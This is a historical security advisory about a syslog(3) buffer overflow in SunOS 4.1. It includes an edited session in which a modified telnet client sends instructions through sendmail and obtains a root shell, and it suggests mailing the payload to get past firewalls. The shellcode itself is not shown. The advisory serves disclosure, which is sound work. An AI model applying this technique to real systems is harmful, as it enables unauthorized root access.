COMMAND
syslog(3)
SYSTEMS AFFECTED
SunOS 4.1.*, possible others.
PROBLEM
syslog(3) uses an internal buffer to build messages. However
it performs no bound checking, and relies on the caller to check
arguments passed to it. Local and remote users can obtain root
access. Here is a edited sample of using a modified telnet
client to obtain a root shell through SunOS sendmail(8) on a
sparc based machine.
legless[8lgm]% syslog_telnet localhost smtp
Trying 127.0.0.1 ...
Connected to localhost.
Escape character is '^]'.
220 legless.8lgm.org Sendmail 4.1/SMI-4.1 ready at Sun,\
27 Aug 95 15:56:27 BST
mail from: root
250 root... Sender ok
rcpt to: root
250 root... Recipient ok
data
354 Enter mail, end with "." on a line by itself
^]
syslog_telnet>
### At this point, we provide some information to the modified
### telnet client about the remote host. Then sparc instructions
### are sent over the link within the body of the message to
### execute a shell.
###
### As soon as data is finished (with .), sendmail will eventually
### report, through syslog(3), data about this message. syslog's
### internal buffer will be overwritten, and our supplied
### instructions are executed.
Hit <cr>, then .<cr>
.
/usr/bin/id;
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/sh: ^M: not found
uptime;
3:57pm up 1:25, 5 users, load average: 0.11, 0.05, 0.00
/bin/sh: ^M: not found
exit;
Connection closed by foreign host.
### Here we can see that sendmail has execed a shell as root,
### and that we can type commands. (lines ending in ; are
### user input through the telnet client).
###
### This exploit could be further expanded upon to encapsulate
### instructions within the body of a message, which can then
### be mailed out to a site (ie without the necessity to connect
### directly to the smtp port). This may be used to bypass
### firewalls.
SOLUTION
Contact vendors for fixes.